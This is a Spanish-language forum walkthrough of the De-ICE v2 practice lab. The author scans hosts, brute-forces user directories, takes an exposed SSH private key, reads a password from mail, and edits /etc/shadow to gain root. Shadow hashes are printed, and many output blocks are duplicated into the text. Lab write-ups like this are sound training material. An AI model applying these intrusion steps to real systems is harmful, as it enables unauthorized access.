Las distribuciónes de seguridad pueden ser descargadas desde Heorot.net.
¿Qué necesitaremos?
-Dos máquinas virtuales
-De-ICE v2
-Backtrack 5
¿Cuáles serán nuestros objetivos?
-Webcrawling
-acceder servidor
-Obtener privilegios de ROOT
¿Reglas?
-No Exploit
Empieza la fiesta.
Lo primero que haremos será unir las dos máquinas virtuales. A de-ice se le asigna por defecto la subred 192.168.2.*.
Esto se puede realizar con el siguiente comando:
Código:
ifconfig eth0 192.168.2.150
Procedamos pues a localizar el servidor.
haremos uso de Netdiscover, o en su defecto, NMAP -sP 192.168.2.*.
Veamos que tenemos por aquí.
Citar
Currently scanning: 192.168.19.0/16 | Screen View: Unique Hosts
2 Captured ARP Req/Rep packets, fro.m 2 hosts. Total size: 120
_____________________________________________________________________________
IP At MAC Address Count Len MAC Vendor
-----------------------------------------------------------------------------
192.168.2.100 08:00:27:b1:50:12 01 060 CADMUS COMPUTER SYSTEMS
192.168.2.101 08:00:27:b1:50:12 01 060 CADMUS COMPUTER SYSTEMS
Tenemos dos sistemas. Escaneamos con NMAP para obtener resultados.2 Captured ARP Req/Rep packets, fro.m 2 hosts. Total size: 120
_____________________________________________________________________________
IP At MAC Address Count Len MAC Vendor
-----------------------------------------------------------------------------
192.168.2.100 08:00:27:b1:50:12 01 060 CADMUS COMPUTER SYSTEMS
192.168.2.101 08:00:27:b1:50:12 01 060 CADMUS COMPUTER SYSTEMS
Citar
nmap -sV 192.168.2.100 - nmap -sV 192.168.2.101
-Primer host:Citar
PORT STATE SERVICE VERSION
20/tcp closed ftp-data
21/tcp open ftp vsftpd 2.0.4
22/tcp open ssh OpenSSH 4.3 (protocol 1.99)
25/tcp open smtp Sendmail 8.13.7/8.13.7
80/tcp open http Apache httpd 2.0.55 ((Unix) PHP/5.1.2)
110/tcp open pop3 Openwall popa3d
143/tcp open imap UW imapd 2004.357
443/tcp closed https
FTP vulnerable... Pero no utilizaremos exploits, ni para atacar, ni para escalar privilegios.20/tcp closed ftp-data
21/tcp open ftp vsftpd 2.0.4
22/tcp open ssh OpenSSH 4.3 (protocol 1.99)
25/tcp open smtp Sendmail 8.13.7/8.13.7
80/tcp open http Apache httpd 2.0.55 ((Unix) PHP/5.1.2)
110/tcp open pop3 Openwall popa3d
143/tcp open imap UW imapd 2004.357
443/tcp closed https
Vemos que el segundo únicamente tiene el puerto 80. Si accedemos a el via web, no vemos más que unos ficheros. Si accedemos a 192.168.2.100, vemos una página Web. Pincho el enlace y veo direcciones de correo. Está claro: Hay un servicio de correo, por lo que habrán dichos usuarios, "seguramente".
Buscando amigos
Seleccionamos la lista de correo, y la limpiamos de forma que simplemente quede el nombre del usuario, argegando el signo ~ (user) para tratar de brutalizar, haber si encontramos algún directorio de interés.
Ésta es mi lista:
Citar
root
admin
~root
~admin
~pickwick
~winkle
~snodgrass
~tupman
~weller
~tweller
~havisham
~magwitch
~pirrip
~nickleby
~rnickleby
~noggs
~squeers
~pinch
~tapley
~gamp
~marley
~scrooge
~cratchit
~sikes
~dawkins
~claypole
Brutalizamos con DirBuster en 192.168.2.101 y vemos que hay un usuario, pirrip. Tratemos si con un poco de suerte existe la carpeta .ssh.admin
~root
~admin
~pickwick
~winkle
~snodgrass
~tupman
~weller
~tweller
~havisham
~magwitch
~pirrip
~nickleby
~rnickleby
~noggs
~squeers
~pinch
~tapley
~gamp
~marley
~scrooge
~cratchit
~sikes
~dawkins
~claypole
http://192.168.2.101/~pirrip/.ssh
Ahí tenemos los id_rsa y id_rsa.pub, esperándonos
Lo almacenamos en /root/.ssh/ y damos permisos 777.
Intruder Here
Procedamos a conectar via SSH.
Citar
Tachán! estamos dentro.You Have New Mail
Entramos y leemos el correo. Hagamos uso de mailx para leer el séptimo correo.
En el vemos:
Citar
root@bt:~# ssh pirrip@192.168.2.100
Linux 2.6.16.
pirrip@slax:~$ mailx
mailx version nail 11.25 7/29/05. Type ? for help.
"/var/mail/pirrip": 7 messages 7 new
>N 1 Abel Magwitch Sun Jan 13 23:53 20/748 Estella
N 2 Estella Havisham Sun Jan 13 23:53 20/780 welcome to the team
N 3 Abel Magwitch Sun Jan 13 23:53 20/875 havisham
N 4 Estella Havisham Mon Jan 14 00:05 20/861 next month
N 5 Abel Magwitch Mon Jan 14 00:05 20/868 vacation
N 6 Abel Magwitch Mon Jan 14 00:05 20/915 vacation
N 7 noreply@fermion.he Mon Jan 14 00:05 29/983 Fermion Account Login Reminder
? 7
Leemos el correo:Linux 2.6.16.
pirrip@slax:~$ mailx
mailx version nail 11.25 7/29/05. Type ? for help.
"/var/mail/pirrip": 7 messages 7 new
>N 1 Abel Magwitch Sun Jan 13 23:53 20/748 Estella
N 2 Estella Havisham Sun Jan 13 23:53 20/780 welcome to the team
N 3 Abel Magwitch Sun Jan 13 23:53 20/875 havisham
N 4 Estella Havisham Mon Jan 14 00:05 20/861 next month
N 5 Abel Magwitch Mon Jan 14 00:05 20/868 vacation
N 6 Abel Magwitch Mon Jan 14 00:05 20/915 vacation
N 7 noreply@fermion.he Mon Jan 14 00:05 29/983 Fermion Account Login Reminder
? 7
Citar
From noreply@fermion.herot.net Mon Jan 14 00:05:15 2008
Return-Path: <noreply@fermion.herot.net>
From: noreply@fermion.herot.net
Date: Sun, 13 Jan 2008 23:54:42 +0000
To: pirrip@slax.example.net
Subject: Fermion Account Login Reminder
User-Agent: nail 11.25 7/29/05
Content-Type: text/plain; charset=us-ascii
Status: R
Fermion Account Login Reminder
Listed below are your Fermion Account login credentials. Please let us know if you have any questions or problems.
Regards,
Fermion Support
E-Mail: pirrip@slax.example.net
Password: 0l1v3rTw1st
Tenemos una clave suculenta...Return-Path: <noreply@fermion.herot.net>
From: noreply@fermion.herot.net
Date: Sun, 13 Jan 2008 23:54:42 +0000
To: pirrip@slax.example.net
Subject: Fermion Account Login Reminder
User-Agent: nail 11.25 7/29/05
Content-Type: text/plain; charset=us-ascii
Status: R
Fermion Account Login Reminder
Listed below are your Fermion Account login credentials. Please let us know if you have any questions or problems.
Regards,
Fermion Support
E-Mail: pirrip@slax.example.net
Password: 0l1v3rTw1st
Root Me, Please!
Hagamos uso de una vieja técnica.
Editamos el fichero /etc/shadows, eliminamos el usuario ROOT y sustituimos pirrip por ROOT. De esta forma nos damos privilegios.
Citar
sudo vi /etc/shadow
Ahí ingresaremos la clave que nos facilitó nuestro amigo via mailAntes:
Citar
root:$1$/Ta1Q0lT$CSY9sjWR33Re2h5ohV4MX/:13882:0:::::
bin:*:9797:0:::::
daemon:*:9797:0:::::
adm:*:9797:0:::::
lp:*:9797:0:::::
sync:*:9797:0:::::
shutdown:*:9797:0:::::
halt:*:9797:0:::::
mail:*:9797:0:::::
news:*:9797:0:::::
uucp:*:9797:0:::::
operator:*:9797:0:::::
games:*:9797:0:::::
ftp:*:9797:0:::::
smmsp:*:9797:0:::::
mysql:*:9797:0:::::
rpc:*:9797:0:::::
sshd:*:9797:0:::::
gdm:*:9797:0:::::
pop:*:9797:0:::::
nobody:*:9797:0:::::
pirrip:$1$KEj04HbT$ZTn.iEtQHcLQc6MjrG/Ig/:13882:0:99999:7:::
magwitch:$1$qG7/dIbT$HtTD946DE3ITkbrCINQvJ0:13882:0:99999:7:::
havisham:$1$qbY1hmdT$sVZn89wKvmLn0wP2JnZay1:13882:0:99999:7:::
Después:bin:*:9797:0:::::
daemon:*:9797:0:::::
adm:*:9797:0:::::
lp:*:9797:0:::::
sync:*:9797:0:::::
shutdown:*:9797:0:::::
halt:*:9797:0:::::
mail:*:9797:0:::::
news:*:9797:0:::::
uucp:*:9797:0:::::
operator:*:9797:0:::::
games:*:9797:0:::::
ftp:*:9797:0:::::
smmsp:*:9797:0:::::
mysql:*:9797:0:::::
rpc:*:9797:0:::::
sshd:*:9797:0:::::
gdm:*:9797:0:::::
pop:*:9797:0:::::
nobody:*:9797:0:::::
pirrip:$1$KEj04HbT$ZTn.iEtQHcLQc6MjrG/Ig/:13882:0:99999:7:::
magwitch:$1$qG7/dIbT$HtTD946DE3ITkbrCINQvJ0:13882:0:99999:7:::
havisham:$1$qbY1hmdT$sVZn89wKvmLn0wP2JnZay1:13882:0:99999:7:::
Citar
bin:*:9797:0:::::
daemon:*:9797:0:::::
adm:*:9797:0:::::
lp:*:9797:0:::::
sync:*:9797:0:::::
shutdown:*:9797:0:::::
halt:*:9797:0:::::
mail:*:9797:0:::::
news:*:9797:0:::::
uucp:*:9797:0:::::
operator:*:9797:0:::::
games:*:9797:0:::::
ftp:*:9797:0:::::
smmsp:*:9797:0:::::
mysql:*:9797:0:::::
rpc:*:9797:0:::::
sshd:*:9797:0:::::
gdm:*:9797:0:::::
pop:*:9797:0:::::
nobody:*:9797:0:::::
root:$1$KEj04HbT$ZTn.iEtQHcLQc6MjrG/Ig/:13882:0:99999:7:::
magwitch:$1$qG7/dIbT$HtTD946DE3ITkbrCINQvJ0:13882:0:99999:7:::
havisham:$1$qbY1hmdT$sVZn89wKvmLn0wP2JnZay1:13882:0:99999:7:::
Guardamos, y tratamos de entrar como superadministrador. Recordemos la clave: 0l1v3rTw1st.daemon:*:9797:0:::::
adm:*:9797:0:::::
lp:*:9797:0:::::
sync:*:9797:0:::::
shutdown:*:9797:0:::::
halt:*:9797:0:::::
mail:*:9797:0:::::
news:*:9797:0:::::
uucp:*:9797:0:::::
operator:*:9797:0:::::
games:*:9797:0:::::
ftp:*:9797:0:::::
smmsp:*:9797:0:::::
mysql:*:9797:0:::::
rpc:*:9797:0:::::
sshd:*:9797:0:::::
gdm:*:9797:0:::::
pop:*:9797:0:::::
nobody:*:9797:0:::::
root:$1$KEj04HbT$ZTn.iEtQHcLQc6MjrG/Ig/:13882:0:99999:7:::
magwitch:$1$qG7/dIbT$HtTD946DE3ITkbrCINQvJ0:13882:0:99999:7:::
havisham:$1$qbY1hmdT$sVZn89wKvmLn0wP2JnZay1:13882:0:99999:7:::
Citar
pirrip@slax:~$ su
Password: ***********
root@slax:/home/pirrip# whoami
root
root@slax:/home/pirrip#
GAME OVER!Password: ***********
root@slax:/home/pirrip# whoami
root
root@slax:/home/pirrip#
Dedicación: 11Sep, [T]rasher, Batista, Exploit-Shell, en fin, a todo OverSec / CPH / H-Sec!
Fuente: Oversec.org (Escrito por mi)
Un saludo